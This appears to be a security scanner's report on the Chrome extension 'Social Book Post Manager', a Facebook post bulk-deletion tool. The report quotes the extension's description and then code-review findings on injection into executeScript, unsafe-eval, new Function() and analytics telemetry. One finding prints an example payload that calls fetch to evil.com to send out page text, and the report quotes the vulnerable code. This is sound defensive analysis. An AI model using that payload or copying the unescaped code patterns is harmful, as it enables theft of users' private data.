Security Alert: Confirmed Malware
Social Book Post Manager
ID: ljfidlkcmdmmibngdfikhffffdmphjae
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author
- htang.devView Profile
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- No
- Mailbox exists
- Yes
Batch delete posts in Fackbook (TM) timeline. Other batch processing: hide / unhide / unlike items. FREE!
==================================== >>> Batch delete Social Book posts/items >>> hide/unhide, unlike >>> Support All Languages on Social Book ==================================== ==================================== The extension is free to use for everyone. ==================================== * Facebook (TM) is a registered trade mark of Facebook. The author of this extension is by no mean associated or affiliated with Facebook. This extension uses absolutely NO any Facebook APIs, and it's therefore not binding with any Facebook APIs licenses. All the occurrences of the word "Facebook" is for descriptive purpose only, and hence it's legally allowed. #deletefacebook #BoycottFacebook "Social Book Post Manager" helps you to delete your posts through the activity log, which include posts by you, and by other persons/apps. You may specify "Year", "Month", "Text Contains", and "Text Not Contains" filters for posts to delete. Plus the activity log filters provided by Facebook (TM), you have full control of which posts to delete, and which posts to keep. Recent new features: 1) Text filters support AND/OR conditions. 2) Prescan the activity log. You can then select exactly which individual entries that you want to delete/hide/unhide/unlike/change privacy settings. 3) Hide/unhide timeline items. 4) Unlike items. ALL the features are FREE for you to use, and totally UNLIMITED. If you are satisfied, please leave me some feedback. Also please feel free to give me suggestion, and bug reports if any. >>> The process is slow. It simulates your mouse click on delete button one-by-one. This is the intentional limitation by Facebook (TM). There is no way to bypass it. <<< >>> Any other Chrome extension may conflict with this extension. If it's not working, please follow the instruction to remove/disable other Chrome extensions temporarily. Then restart Chrome and try again. <<< >>> Use filter features as much as possible, and try limit the number of posts to be processed. The more data need to be processed, the more likely your browser and the Facebook (TM) server will fail to function properly. It's recommended to process one month at a time, unless you are sure there isn't many posts left to be processed.<<< ================================ Notes: The scanning/deletion process takes a LONG time to finish, depending on number of posts involved. Because Facebook (TM) does not want the users to easily remove posts, they don't provide any function/API to delete multiple posts at a time. This extension can only filter/delete posts one-by-one. There is no any known method to accelerate this process. Please be patient, sit back, and let the extension does its job. You may have a coffee, or better just let it run through a night. ================================ ==================================== Privacy and Information Security 1) This extension does not track or record any user information. It does not use cookie or any other mechanism to record users page visits. 2) This extension does not track or record whether a user posts a review, or makes a donation. Whether you review/donate or not will not affect how it works. 3) Because this extension does not store anything anywhere, this app does not support features like auto-retry, user preference, etc. This is designed on purpose. I believe user privacy is much more important than any features, particularly for this Chrome extension. 4) This extension uses Google Analytics API to log which features (delete/hide/unlike, etc.) are being used most by the users, and whether the process runs successfully. The log result is not associated, nor linked with each individual user. The data is purely used by the author to know which features are used most, and whether it's working properly. If you want to be opted-out of this, you can install the Google Analytics Opt-out add-on in https://tools.google.com/dlpage/gaoptout 5) This extension is completely written in Javascript, and running completely within users Chrome browsers. All the source code can be viewed with Chrome Developer Tools. The code has been analyzed many times by many other developers. The extension has been used by nearly 200,000 users. If there is anything bad, it would have already been reported. You can feel absolutely safe to use it. ==================================== Instructions (with "Prescan" option checked): 1. Login to Facebook (TM), go to the Activity Log. Use activity filters to select a subset of posts to delete. 2. Click the extension's button to open the interface. 3. If needed, choose "Year", "Month", "Text Contains" and "Text Not Contains" for posts that you want to delete. 4. Click the "Delete Post" button. The extension will scan through your Activity Log and mark all posts matching the conditions. 5. The prescan process may take a long time, depending on number of posts to be deleted. 6. After the prescan process finishes, there will be a Confirm button shown on top of the Facebook (TM) page. You may verify and uncheck certain posts as desired, then continue to actually delete the posts. 7. When done, the extension reports total number of posts deleted. ================================ Instructions (with "Prescan" option unchecked): 1. Login to Facebook (TM), go to the Activity Log. Use activity filters to select a subset of posts to delete. 2. Click the extension's button to open the interface. 3. If needed, choose "Year", "Month", "Text Contains" and "Text Not Contains" for posts that you want to delete. 4. Click the "Delete Post" button. The extension will scan through your Activity Log and delete all posts matching the conditions. 5. The deletion process may take a long time, depending on number of posts to be deleted. 6. Deleted post counter is displayed in real-time. You may stop the deletion process at any time by clicking the "Stop Now" button. 7. When done, the extension reports total number of posts deleted. ================================ Update History: 1.4.13 Facebook (TM) changed underlying service call. I need to re-adjust the code again. 1.4.8-1.4.9 Removed all "ace". 1.4.7 Facebook (TM) changed their page layout again, privacy feature no longer works. I had to disable the button of this feature. 1.4.5-1.4.6 1) Add the year 2017. 2) Lower the default speed. 3) Add/modify some instructions. 1.4.4 1) Add option "Speed". This may improve the success rate for slower Internet/PC. 2) UI changes. 3) Bug fixes. 1.4.3 I has to deliberately slow down the batch process of privacy. When the extension is running too fast, Facebook (TM) does not process all the requests. 1.4.1-1.4.2 Bug fixes. 1.4.0 Now the extension can change privacy settings of posts in batch. 1.3.10 Bug fix. 1.3.9 Bug fix. 1.3.8 1) Detect and skip more Facebook (TM) deletion error and continue with the next item. 2) Performance optimization. 1.3.7 The extension will skip deletion error and continue with the next item. 1.3.6 Another another change on Facebook (TM), and Facebook (TM) pages of different languages have DIFFERENT structures!!! 1.3.5 Another change on Facebook (TM) 1.3.4 Facebook (TM) changed some underlying structure. The extension is revised so as to be compatible. 1.3.3 Facebook (TM) Comments can be properly deleted now. 1.3.2 Improvements on search to a specific year-month. 1.3.1 Add more instructions in the popup. 1.3.0 New semi-parallel delete process implementation. It's significantly faster now! 1.2.1-1.2.0 Now the string filters support AND / OR condition operators. 1.1.9-1.1.7 Bug fixes. 1.1.6 Added a Backup button, which links to Facebook (TM) "Download Your Information" page. 1.1.5-1.1.1 Bug fixes and GUI revision. 1.1.0 Major update 1) Added support for on-page prescan of the activity log. 2) Users can manually select/deselect entries to delete. 1.0.9 Optimization - almost 100% eliminated page-out-of-sync issue. 1.0.8 Bug fixes. 1.0.7 Optimization. 1.0.6 Bug fixes. 1.0.5 Bug fixes and optimization. 1.0.4 1) New feature: hide/unhide timeline items. 2) New feature: unlike items. 1.0.3 1) Added text filters for post deletion. 2) Added highlight effect upon text filters. 1.0.2 1) Added real-time display of deletion counter. 2) Added "Stop Now" button for immediate termination of the deletion process. 1.0.1 Optimization to reduce the chance of Page-out-of-sync issue. 1.0 Initial Version. ================================ Notes: 1. In certain scenario, the extension may stop working. Simply reload the Facebook (TM) page, reopen the extension's interface, and start the process again. 2. This extension does not retrieve or store any Facebook (TM) login credential, nor will it retrieve any other information from your Facebook (TM) account. 3. Deleted posts are not recoverable. Please carefully choose the Activity Log filter, the Year, and the Month for deletion. The author shall not take any responsibility for any potential loss of information due to post deletion. 4. I've thoroughly tested the extension upon the Facebook (TM) Activity Log, in multiple language interfaces, including English, French, Chinese, etc. So far, it works perfectly upon all language interfaces.
User-controlled text from the 'Text Contains' and 'Text Not Contains' input fields is concatenated directly into a JavaScript code string passed to chrome.tabs.executeScript without any escaping or sanitization. An attacker who tricks the user into pasting a crafted value such as `";fetch('https://evil.com?d='+document.body.innerText)//` into the filter box would cause that code to execute in the context of the active Facebook tab, enabling data exfiltration of the entire activity log page contents. This is a stored-on-page code injection vector with direct access to Facebook DOM data.
$("#textContains").on("change paste mouseup keyup", function() { if ($(this).val() != Popup.lastValueTextContains) { Popup.lastValueTextContains = $(this).val(); chrome.tabs.executeScript({ code: 'Utils.containText="' + Popup.lastValueTextContains.trim().toLowerCase() + '";Utils.containTextFunc=null;Utils.highlighterStarted=true;Utils.highlight();' }); }});$("#textNotContains").on("change paste mouseup keyup", function() { if ($(this).val() != Popup.lastValueTextNotContains) { Popup.lastValueTextNotContains = $(this).val(); chrome.tabs.executeScript({ code: 'Utils.notContainText="' + Popup.lastValueTextNotContains.trim().toLowerCase() + '";Utils.notContainTextFunc=null;Utils.highlighterStarted=true;Utils.highlight();' }); }});Multiple user-supplied filter values (dateRange, strContains, strNotContains) are interpolated without escaping into JavaScript code strings executed via chrome.tabs.executeScript on the active Facebook tab. Any of these paths can be exploited by a crafted input to break out of the string literal context and inject arbitrary JavaScript that runs with access to the Facebook page DOM. Combined with the 'Text Contains/Not Contains' real-time injection path at line 531, there are at least three unsanitized injection points targeting the Facebook page.
if (dateRange) { console.log("Date Range: " + dateRange); chrome.tabs.executeScript({ code: 'PostDeletor.dateRange="' + dateRange + '";' });}var strContains = "";if ($("#textContains").val()) { strContains = $("#textContains").val().trim().toLowerCase(); console.log(strContains); chrome.tabs.executeScript({ code: 'PostDeletor.containText="' + strContains + '";' });}var strNotContains = "";if ($("#textNotContains").val()) { strNotContains = $("#textNotContains").val().trim().toLowerCase(); console.log(strNotContains); chrome.tabs.executeScript({ code: 'PostDeletor.notContainText="' + strNotContains + '";' });}The extension explicitly declares 'unsafe-eval' in its Content Security Policy, allowing dynamic code evaluation via eval(), new Function(), and similar constructs across both the extension popup and content scripts. This is a mandatory prerequisite for the dynamic function construction observed elsewhere in the codebase. The CSP also whitelists an external domain (ssl.google-analytics.com) for script execution, creating a supply-chain attack surface if that origin is ever compromised.
{ "content_security_policy": [ "script-src 'self' 'unsafe-eval' https://ssl.google-analytics.com", "object-src 'self'" ]}When the user's filter text contains the word 'and' or 'or', the extension builds a JavaScript function body by string-substituting the raw user input and passes it to new Function() — the equivalent of eval(). A crafted input such as `foo or alert(1)` or a more elaborate payload could escape the substitution regex and inject arbitrary JavaScript executed within the Facebook page content script context. The same pattern appears for notContainText (line 683) and is duplicated verbatim in content-commons-utils.js (lines 164-201), giving four total dynamic code construction sites.
PostDeletor.prepareContainTextFunc = function() { if (PostDeletor.containText && !PostDeletor.containTextFunc) { if (!PostDeletor.containText.match(/\b(and|or)\b/i)) { PostDeletor.containTextFunc = "NA"; return; } try { var containTextExp = math.parse(PostDeletor.containText); var exp = PostDeletor.containText; exp = exp.replace(/\band\b/g, "&&"); exp = exp.replace(/\bor\b/g, "||"); exp = exp.replace(/[\-\w\:\,\.]+(?:\s+[\-\w\:\,\.]+)*/g, "target.search('$&')>=0"); exp = "return " + exp + ";"; PostDeletor.containTextFunc = new Function('target', exp); } catch (err) { PostDeletor.containTextFunc = "NA"; } }}The background page dynamically injects a Google Analytics script (ga.js) from an external origin at runtime, and the manifest CSP explicitly whitelists ssl.google-analytics.com for this purpose. This creates a supply-chain risk: if the Analytics endpoint were compromised or the domain redirected, the injected script would execute with extension background page privileges. Additionally, the extension tracks detailed user operation events (delete, hide, unhide, unlike, privacy changes) and relays them to GA, constituting behavioral telemetry that users are unlikely aware of.
var _gaq = _gaq || [];_gaq.push(['_setAccount', 'UA-73397006-2']);(function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = 'https://ssl.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();chrome.runtime.onMessage.addListener( function(request, sender, sendResponse) { ... else if (request && request.match(/^\{event\:/ig)) { var m = request.match(/^\{event\:([^,]+),action\:([^\}]+)\}$/i); if (m && m.length >= 3) { var eventCategory = m[1]; var eventAction = m[2]; _gaq.push(['_trackEvent', eventCategory, eventAction]); } } else if (request && request.indexOf("Success!") == 0) { var m = request.match(...); _gaq.push(['_trackEvent', 'operation', 'success']); }The extension popup also dynamically loads Google Analytics from an external URL and fires a page-view event every time the popup is opened, tracking how frequently the extension is used. Combined with event tracking of every button click (delete, hide, unhide, unlike, privacy changes), the extension collects granular behavioral telemetry about users' Facebook activity management patterns without explicit disclosure in the permissions or UI.
var _gaq = _gaq || [];_gaq.push(['_setAccount', 'UA-73397006-2']);_gaq.push(['_trackPageview']);(function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = 'https://ssl.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();By severity
Versions scanned
Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 1.4.13 | 6 |
Files with findings
4 distinct paths — top paths by unique finding count:
- ext-popup.js3
- content-postDeletor.js1
- ext-eventPage.js1
- manifest.json1
URLs
View the external URLs this extension communicates with to understand its network activity and data interactions.
Gain full insight into all external connections.
Upgrade for full visibility.
Gain full insight into all external connections.
Upgrade for full visibility.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.